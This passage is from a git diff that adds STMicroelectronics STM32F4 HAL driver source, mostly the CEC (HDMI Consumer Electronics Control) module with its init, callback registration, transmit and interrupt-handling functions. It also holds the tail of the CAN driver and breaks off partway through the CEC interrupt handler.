CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_RxFifo1FullCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_RxFifo1FullCallback could be implemented in the user + file + */ +} + +/** + * @brief Sleep callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_SleepCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_SleepCallback could be implemented in the user file + */ +} + +/** + * @brief WakeUp from Rx message callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_WakeUpFromRxMsgCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_WakeUpFromRxMsgCallback could be implemented in the + user file + */ +} + +/** + * @brief Error CAN callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_ErrorCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group6 Peripheral State and Error functions + * @brief CAN Peripheral State functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Error functions ##### + ============================================================================== + [..] + This subsection provides functions allowing to : + (+) HAL_CAN_GetState() : Return the CAN state. + (+) HAL_CAN_GetError() : Return the CAN error codes if any. + (+) HAL_CAN_ResetError(): Reset the CAN error codes if any. + +@endverbatim + * @{ + */ + +/** + * @brief Return the CAN state. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL state + */ +HAL_CAN_StateTypeDef HAL_CAN_GetState(CAN_HandleTypeDef *hcan) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check sleep mode acknowledge flag */ + if ((hcan->Instance->MSR & CAN_MSR_SLAK) != 0U) + { + /* Sleep mode is active */ + state = HAL_CAN_STATE_SLEEP_ACTIVE; + } + /* Check sleep mode request flag */ + else if ((hcan->Instance->MCR & CAN_MCR_SLEEP) != 0U) + { + /* Sleep mode request is pending */ + state = HAL_CAN_STATE_SLEEP_PENDING; + } + else + { + /* Neither sleep mode request nor sleep mode acknowledge */ + } + } + + /* Return CAN state */ + return state; +} + +/** + * @brief Return the CAN error code. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval CAN Error Code + */ +uint32_t HAL_CAN_GetError(CAN_HandleTypeDef *hcan) +{ + /* Return CAN error code */ + return hcan->ErrorCode; +} + +/** + * @brief Reset the CAN error code. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_ResetError(CAN_HandleTypeDef *hcan) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Reset CAN error code */ + hcan->ErrorCode = 0U; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + status = HAL_ERROR; + } + + /* Return the status */ + return status; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_CAN_MODULE_ENABLED */ + +/** + * @} + */ + +#endif /* CAN1 */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cec.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cec.c new file mode 100644 index 000000000..c599bcfc4 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cec.c @@ -0,0 +1,997 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_cec.c + * @author MCD Application Team + * @brief CEC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the High Definition Multimedia Interface + * Consumer Electronics Control Peripheral (CEC). + * + Initialization and de-initialization function + * + IO operation function + * + Peripheral Control function + * + * + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + The CEC HAL driver can be used as follow: + + (#) Declare a CEC_HandleTypeDef handle structure. + (#) Initialize the CEC low level resources by implementing the HAL_CEC_MspInit ()API: + (##) Enable the CEC interface clock. + (##) CEC pins configuration: + (+++) Enable the clock for the CEC GPIOs. + (+++) Configure these CEC pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_CEC_Transmit_IT() + and HAL_CEC_Receive_IT() APIs): + (+++) Configure the CEC interrupt priority. + (+++) Enable the NVIC CEC IRQ handle. + (+++) The specific CEC interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_CEC_ENABLE_IT() and __HAL_CEC_DISABLE_IT() inside the transmit + and receive process. + + (#) Program the Signal Free Time (SFT) and SFT option, Tolerance, reception stop in + in case of Bit Rising Error, Error-Bit generation conditions, device logical + address and Listen mode in the hcec Init structure. + + (#) Initialize the CEC registers by calling the HAL_CEC_Init() API. + + [..] + (@) This API (HAL_CEC_Init()) configures also the low level Hardware (GPIO, CLOCK, CORTEX...etc) + by calling the customed HAL_CEC_MspInit() API. + *** Callback registration *** + ============================================= + + The compilation define USE_HAL_CEC_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_CEC_RegisterCallback() or HAL_CEC_RegisterXXXCallback() + to register an interrupt callback. + + Function HAL_CEC_RegisterCallback() allows to register following callbacks: + (+) TxCpltCallback : Tx Transfer completed callback. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : CEC MspInit. + (+) MspDeInitCallback : CEC MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + For specific callback HAL_CEC_RxCpltCallback use dedicated register callbacks + HAL_CEC_RegisterRxCpltCallback(). + + Use function HAL_CEC_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_CEC_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxCpltCallback : Tx Transfer completed callback. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : CEC MspInit. + (+) MspDeInitCallback : CEC MspDeInit. + + For callback HAL_CEC_RxCpltCallback use dedicated unregister callback : + HAL_CEC_UnRegisterRxCpltCallback(). + + By default, after the HAL_CEC_Init() and when the state is HAL_CEC_STATE_RESET + all callbacks are set to the corresponding weak functions : + examples HAL_CEC_TxCpltCallback() , HAL_CEC_RxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak function in the HAL_CEC_Init()/ HAL_CEC_DeInit() only when + these callbacks are null (not registered beforehand). + if not, MspInit or MspDeInit are not null, the HAL_CEC_Init() / HAL_CEC_DeInit() + keep and use the user MspInit/MspDeInit functions (registered beforehand) + + Callbacks can be registered/unregistered in HAL_CEC_STATE_READY state only. + Exception done MspInit/MspDeInit callbacks that can be registered/unregistered + in HAL_CEC_STATE_READY or HAL_CEC_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_CEC_RegisterCallback() before calling HAL_CEC_DeInit() + or HAL_CEC_Init() function. + + When the compilation define USE_HAL_CEC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup CEC CEC + * @brief HAL CEC module driver + * @{ + */ +#ifdef HAL_CEC_MODULE_ENABLED +#if defined (CEC) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup CEC_Private_Constants CEC Private Constants + * @{ + */ +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup CEC_Private_Functions CEC Private Functions + * @{ + */ +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ + +/** @defgroup CEC_Exported_Functions CEC Exported Functions + * @{ + */ + +/** @defgroup CEC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim +=============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to initialize the CEC + (+) The following parameters need to be configured: + (++) SignalFreeTime + (++) Tolerance + (++) BRERxStop (RX stopped or not upon Bit Rising Error) + (++) BREErrorBitGen (Error-Bit generation in case of Bit Rising Error) + (++) LBPEErrorBitGen (Error-Bit generation in case of Long Bit Period Error) + (++) BroadcastMsgNoErrorBitGen (Error-bit generation in case of broadcast message error) + (++) SignalFreeTimeOption (SFT Timer start definition) + (++) OwnAddress (CEC device address) + (++) ListenMode + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the CEC mode according to the specified + * parameters in the CEC_InitTypeDef and creates the associated handle . + * @param hcec CEC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_Init(CEC_HandleTypeDef *hcec) +{ + /* Check the CEC handle allocation */ + if ((hcec == NULL) || (hcec->Init.RxBuffer == NULL)) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CEC_ALL_INSTANCE(hcec->Instance)); + assert_param(IS_CEC_SIGNALFREETIME(hcec->Init.SignalFreeTime)); + assert_param(IS_CEC_TOLERANCE(hcec->Init.Tolerance)); + assert_param(IS_CEC_BRERXSTOP(hcec->Init.BRERxStop)); + assert_param(IS_CEC_BREERRORBITGEN(hcec->Init.BREErrorBitGen)); + assert_param(IS_CEC_LBPEERRORBITGEN(hcec->Init.LBPEErrorBitGen)); + assert_param(IS_CEC_BROADCASTERROR_NO_ERRORBIT_GENERATION(hcec->Init.BroadcastMsgNoErrorBitGen)); + assert_param(IS_CEC_SFTOP(hcec->Init.SignalFreeTimeOption)); + assert_param(IS_CEC_LISTENING_MODE(hcec->Init.ListenMode)); + assert_param(IS_CEC_OWN_ADDRESS(hcec->Init.OwnAddress)); + +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1) + if (hcec->gState == HAL_CEC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcec->Lock = HAL_UNLOCKED; + + hcec->TxCpltCallback = HAL_CEC_TxCpltCallback; /* Legacy weak TxCpltCallback */ + hcec->RxCpltCallback = HAL_CEC_RxCpltCallback; /* Legacy weak RxCpltCallback */ + hcec->ErrorCallback = HAL_CEC_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hcec->MspInitCallback == NULL) + { + hcec->MspInitCallback = HAL_CEC_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware */ + hcec->MspInitCallback(hcec); + } +#else + if (hcec->gState == HAL_CEC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcec->Lock = HAL_UNLOCKED; + /* Init the low level hardware : GPIO, CLOCK */ + HAL_CEC_MspInit(hcec); + } +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + + hcec->gState = HAL_CEC_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_CEC_DISABLE(hcec); + + /* Write to CEC Control Register */ + hcec->Instance->CFGR = hcec->Init.SignalFreeTime | hcec->Init.Tolerance | hcec->Init.BRERxStop | \ + hcec->Init.BREErrorBitGen | hcec->Init.LBPEErrorBitGen | hcec->Init.BroadcastMsgNoErrorBitGen | \ + hcec->Init.SignalFreeTimeOption | ((uint32_t)(hcec->Init.OwnAddress) << 16U) | \ + hcec->Init.ListenMode; + + /* Enable the following CEC Transmission/Reception interrupts as + * well as the following CEC Transmission/Reception Errors interrupts + * Rx Byte Received IT + * End of Reception IT + * Rx overrun + * Rx bit rising error + * Rx short bit period error + * Rx long bit period error + * Rx missing acknowledge + * Tx Byte Request IT + * End of Transmission IT + * Tx Missing Acknowledge IT + * Tx-Error IT + * Tx-Buffer Underrun IT + * Tx arbitration lost */ + __HAL_CEC_ENABLE_IT(hcec, CEC_IT_RXBR | CEC_IT_RXEND | CEC_IER_RX_ALL_ERR | CEC_IT_TXBR | CEC_IT_TXEND | + CEC_IER_TX_ALL_ERR); + + /* Enable the CEC Peripheral */ + __HAL_CEC_ENABLE(hcec); + + hcec->ErrorCode = HAL_CEC_ERROR_NONE; + hcec->gState = HAL_CEC_STATE_READY; + hcec->RxState = HAL_CEC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the CEC peripheral + * @param hcec CEC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_DeInit(CEC_HandleTypeDef *hcec) +{ + /* Check the CEC handle allocation */ + if (hcec == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CEC_ALL_INSTANCE(hcec->Instance)); + + hcec->gState = HAL_CEC_STATE_BUSY; + +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1) + if (hcec->MspDeInitCallback == NULL) + { + hcec->MspDeInitCallback = HAL_CEC_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware */ + hcec->MspDeInitCallback(hcec); + +#else + /* DeInit the low level hardware */ + HAL_CEC_MspDeInit(hcec); +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + + /* Disable the Peripheral */ + __HAL_CEC_DISABLE(hcec); + + /* Clear Flags */ + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_TXEND | CEC_FLAG_TXBR | CEC_FLAG_RXBR | CEC_FLAG_RXEND | CEC_ISR_ALL_ERROR); + + /* Disable the following CEC Transmission/Reception interrupts as + * well as the following CEC Transmission/Reception Errors interrupts + * Rx Byte Received IT + * End of Reception IT + * Rx overrun + * Rx bit rising error + * Rx short bit period error + * Rx long bit period error + * Rx missing acknowledge + * Tx Byte Request IT + * End of Transmission IT + * Tx Missing Acknowledge IT + * Tx-Error IT + * Tx-Buffer Underrun IT + * Tx arbitration lost */ + __HAL_CEC_DISABLE_IT(hcec, CEC_IT_RXBR | CEC_IT_RXEND | CEC_IER_RX_ALL_ERR | CEC_IT_TXBR | CEC_IT_TXEND | + CEC_IER_TX_ALL_ERR); + + hcec->ErrorCode = HAL_CEC_ERROR_NONE; + hcec->gState = HAL_CEC_STATE_RESET; + hcec->RxState = HAL_CEC_STATE_RESET; + + /* Process Unlock */ + __HAL_UNLOCK(hcec); + + return HAL_OK; +} + +/** + * @brief Initializes the Own Address of the CEC device + * @param hcec CEC handle + * @param CEC_OwnAddress The CEC own address. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_SetDeviceAddress(CEC_HandleTypeDef *hcec, uint16_t CEC_OwnAddress) +{ + /* Check the parameters */ + assert_param(IS_CEC_OWN_ADDRESS(CEC_OwnAddress)); + + if ((hcec->gState == HAL_CEC_STATE_READY) && (hcec->RxState == HAL_CEC_STATE_READY)) + { + /* Process Locked */ + __HAL_LOCK(hcec); + + hcec->gState = HAL_CEC_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_CEC_DISABLE(hcec); + + if (CEC_OwnAddress != CEC_OWN_ADDRESS_NONE) + { + hcec->Instance->CFGR |= ((uint32_t)CEC_OwnAddress << 16); + } + else + { + hcec->Instance->CFGR &= ~(CEC_CFGR_OAR); + } + + hcec->gState = HAL_CEC_STATE_READY; + hcec->ErrorCode = HAL_CEC_ERROR_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hcec); + + /* Enable the Peripheral */ + __HAL_CEC_ENABLE(hcec); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief CEC MSP Init + * @param hcec CEC handle + * @retval None + */ +__weak void HAL_CEC_MspInit(CEC_HandleTypeDef *hcec) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcec); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CEC_MspInit can be implemented in the user file + */ +} + +/** + * @brief CEC MSP DeInit + * @param hcec CEC handle + * @retval None + */ +__weak void HAL_CEC_MspDeInit(CEC_HandleTypeDef *hcec) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcec); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CEC_MspDeInit can be implemented in the user file + */ +} +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User CEC Callback + * To be used instead of the weak predefined callback + * @param hcec CEC handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_CEC_TX_CPLT_CB_ID Tx Complete callback ID + * @arg @ref HAL_CEC_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CEC_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CEC_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_RegisterCallback(CEC_HandleTypeDef *hcec, HAL_CEC_CallbackIDTypeDef CallbackID, + pCEC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hcec); + + if (hcec->gState == HAL_CEC_STATE_READY) + { + switch (CallbackID) + { + case HAL_CEC_TX_CPLT_CB_ID : + hcec->TxCpltCallback = pCallback; + break; + + case HAL_CEC_ERROR_CB_ID : + hcec->ErrorCallback = pCallback; + break; + + case HAL_CEC_MSPINIT_CB_ID : + hcec->MspInitCallback = pCallback; + break; + + case HAL_CEC_MSPDEINIT_CB_ID : + hcec->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcec->gState == HAL_CEC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CEC_MSPINIT_CB_ID : + hcec->MspInitCallback = pCallback; + break; + + case HAL_CEC_MSPDEINIT_CB_ID : + hcec->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcec); + + return status; +} + +/** + * @brief Unregister an CEC Callback + * CEC callabck is redirected to the weak predefined callback + * @param hcec uart handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_CEC_TX_CPLT_CB_ID Tx Complete callback ID + * @arg @ref HAL_CEC_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CEC_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CEC_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_CEC_UnRegisterCallback(CEC_HandleTypeDef *hcec, HAL_CEC_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hcec); + + if (hcec->gState == HAL_CEC_STATE_READY) + { + switch (CallbackID) + { + case HAL_CEC_TX_CPLT_CB_ID : + hcec->TxCpltCallback = HAL_CEC_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_CEC_ERROR_CB_ID : + hcec->ErrorCallback = HAL_CEC_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_CEC_MSPINIT_CB_ID : + hcec->MspInitCallback = HAL_CEC_MspInit; + break; + + case HAL_CEC_MSPDEINIT_CB_ID : + hcec->MspDeInitCallback = HAL_CEC_MspDeInit; + break; + + default : + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcec->gState == HAL_CEC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CEC_MSPINIT_CB_ID : + hcec->MspInitCallback = HAL_CEC_MspInit; + break; + + case HAL_CEC_MSPDEINIT_CB_ID : + hcec->MspDeInitCallback = HAL_CEC_MspDeInit; + break; + + default : + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcec); + + return status; +} + +/** + * @brief Register CEC RX complete Callback + * To be used instead of the weak HAL_CEC_RxCpltCallback() predefined callback + * @param hcec CEC handle + * @param pCallback pointer to the Rx transfer compelete Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_RegisterRxCpltCallback(CEC_HandleTypeDef *hcec, pCEC_RxCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hcec); + + if (HAL_CEC_STATE_READY == hcec->RxState) + { + hcec->RxCpltCallback = pCallback; + } + else + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcec); + return status; +} + +/** + * @brief UnRegister CEC RX complete Callback + * CEC RX complete Callback is redirected to the weak HAL_CEC_RxCpltCallback() predefined callback + * @param hcec CEC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_UnRegisterRxCpltCallback(CEC_HandleTypeDef *hcec) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hcec); + + if (HAL_CEC_STATE_READY == hcec->RxState) + { + hcec->RxCpltCallback = HAL_CEC_RxCpltCallback; /* Legacy weak CEC RxCpltCallback */ + } + else + { + /* Update the error code */ + hcec->ErrorCode |= HAL_CEC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcec); + return status; +} +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup CEC_Exported_Functions_Group2 Input and Output operation functions + * @brief CEC Transmit/Receive functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + This subsection provides a set of functions allowing to manage the CEC data transfers. + + (#) The CEC handle must contain the initiator (TX side) and the destination (RX side) + logical addresses (4-bit long addresses, 0xF for broadcast messages destination) + + (#) The communication is performed using Interrupts. + These API's return the HAL status. + The end of the data processing will be indicated through the + dedicated CEC IRQ when using Interrupt mode. + The HAL_CEC_TxCpltCallback(), HAL_CEC_RxCpltCallback() user callbacks + will be executed respectively at the end of the transmit or Receive process + The HAL_CEC_ErrorCallback() user callback will be executed when a communication + error is detected + + (#) API's with Interrupt are : + (+) HAL_CEC_Transmit_IT() + (+) HAL_CEC_IRQHandler() + + (#) A set of User Callbacks are provided: + (+) HAL_CEC_TxCpltCallback() + (+) HAL_CEC_RxCpltCallback() + (+) HAL_CEC_ErrorCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Send data in interrupt mode + * @param hcec CEC handle + * @param InitiatorAddress Initiator address + * @param DestinationAddress destination logical address + * @param pData pointer to input byte data buffer + * @param Size amount of data to be sent in bytes (without counting the header). + * 0 means only the header is sent (ping operation). + * Maximum TX size is 15 bytes (1 opcode and up to 14 operands). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CEC_Transmit_IT(CEC_HandleTypeDef *hcec, uint8_t InitiatorAddress, uint8_t DestinationAddress, + uint8_t *pData, uint32_t Size) +{ + /* if the peripheral isn't already busy and if there is no previous transmission + already pending due to arbitration lost */ + if (hcec->gState == HAL_CEC_STATE_READY) + { + if ((pData == NULL) && (Size > 0U)) + { + return HAL_ERROR; + } + + assert_param(IS_CEC_ADDRESS(DestinationAddress)); + assert_param(IS_CEC_ADDRESS(InitiatorAddress)); + assert_param(IS_CEC_MSGSIZE(Size)); + + /* Process Locked */ + __HAL_LOCK(hcec); + hcec->pTxBuffPtr = pData; + hcec->gState = HAL_CEC_STATE_BUSY_TX; + hcec->ErrorCode = HAL_CEC_ERROR_NONE; + + /* initialize the number of bytes to send, + * 0 means only one header is sent (ping operation) */ + hcec->TxXferCount = (uint16_t)Size; + + /* in case of no payload (Size = 0), sender is only pinging the system; + Set TX End of Message (TXEOM) bit, must be set before writing data to TXDR */ + if (Size == 0U) + { + __HAL_CEC_LAST_BYTE_TX_SET(hcec); + } + + /* send header block */ + hcec->Instance->TXDR = (uint32_t)(((uint32_t)InitiatorAddress << CEC_INITIATOR_LSB_POS) | DestinationAddress); + + /* Set TX Start of Message (TXSOM) bit */ + __HAL_CEC_FIRST_BYTE_TX_SET(hcec); + + /* Process Unlocked */ + __HAL_UNLOCK(hcec); + + return HAL_OK; + + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Get size of the received frame. + * @param hcec CEC handle + * @retval Frame size + */ +uint32_t HAL_CEC_GetLastReceivedFrameSize(CEC_HandleTypeDef *hcec) +{ + return hcec->RxXferSize; +} + +/** + * @brief Change Rx Buffer. + * @param hcec CEC handle + * @param Rxbuffer Rx Buffer + * @note This function can be called only inside the HAL_CEC_RxCpltCallback() + * @retval Frame size + */ +void HAL_CEC_ChangeRxBuffer(CEC_HandleTypeDef *hcec, uint8_t *Rxbuffer) +{ + hcec->Init.RxBuffer = Rxbuffer; +} + +/** + * @brief This function handles CEC interrupt requests. + * @param hcec CEC handle + * @retval None + */ +void HAL_CEC_IRQHandler(CEC_HandleTypeDef *hcec) +{ + + /* save interrupts register for further error or interrupts handling purposes */ + uint32_t reg; + reg = hcec->Instance->ISR; + + + /* ----------------------------Arbitration Lost Management----------------------------------*/ + /* CEC TX arbitration error interrupt occurred --------------------------------------*/ + if ((reg & CEC_FLAG_ARBLST) != 0U) + { + hcec->ErrorCode = HAL_CEC_ERROR_ARBLST; + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_ARBLST); + } + + /* ----------------------------Rx Management----------------------------------*/ + /* CEC RX byte received interrupt ---------------------------------------------------*/ + if ((reg & CEC_FLAG_RXBR) != 0U) + { + /* reception is starting */ + hcec->RxState = HAL_CEC_STATE_BUSY_RX; + hcec->RxXferSize++; + /* read received byte */ + *hcec->Init.RxBuffer = (uint8_t) hcec->Instance->RXDR; + hcec->Init.RxBuffer++; + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_RXBR); + } + + /* CEC RX end received interrupt ---------------------------------------------------*/ + if ((reg & CEC_FLAG_RXEND) != 0U) + { + /* clear IT */ + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_RXEND); + + /* Rx process is completed, restore hcec->RxState to Ready */ + hcec->RxState = HAL_CEC_STATE_READY; + hcec->ErrorCode = HAL_CEC_ERROR_NONE; + hcec->Init.RxBuffer -= hcec->RxXferSize; +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1U) + hcec->RxCpltCallback(hcec, hcec->RxXferSize); +#else + HAL_CEC_RxCpltCallback(hcec, hcec->RxXferSize); +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + hcec->RxXferSize = 0U; + } + + /* ----------------------------Tx Management----------------------------------*/ + /* CEC TX byte request interrupt ------------------------------------------------*/ + if ((reg & CEC_FLAG_TXBR) != 0U) + { + --hcec->TxXferCount; + if (hcec->TxXferCount == 0U) + { + /* if this is the last byte transmission, set TX End of Message (TXEOM) bit */ + __HAL_CEC_LAST_BYTE_TX_SET(hcec); + } + /* In all cases transmit the byte */ + hcec->Instance->TXDR = *hcec->pTxBuffPtr; + hcec->pTxBuffPtr++; + /* clear Tx-Byte request flag */ + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_TXBR); + } + + /* CEC TX end interrupt ------------------------------------------------*/ + if ((reg & CEC_FLAG_TXEND) != 0U) + { + __HAL_CEC_CLEAR_FLAG(hcec, CEC_FLAG_TXEND); + + /* Tx process is ended, restore hcec->gState to Ready */ + hcec->gState = HAL_CEC_STATE_READY; + /* Call the Process Unlocked before calling the Tx call back API to give the possibility to + start again the Transmission under the Tx call back API */ + __HAL_UNLOCK(hcec); + hcec->ErrorCode = HAL_CEC_ERROR_NONE; +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1U) + hcec->TxCpltCallback(hcec); +#else + HAL_CEC_TxCpltCallback(hcec); +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + } + + /* 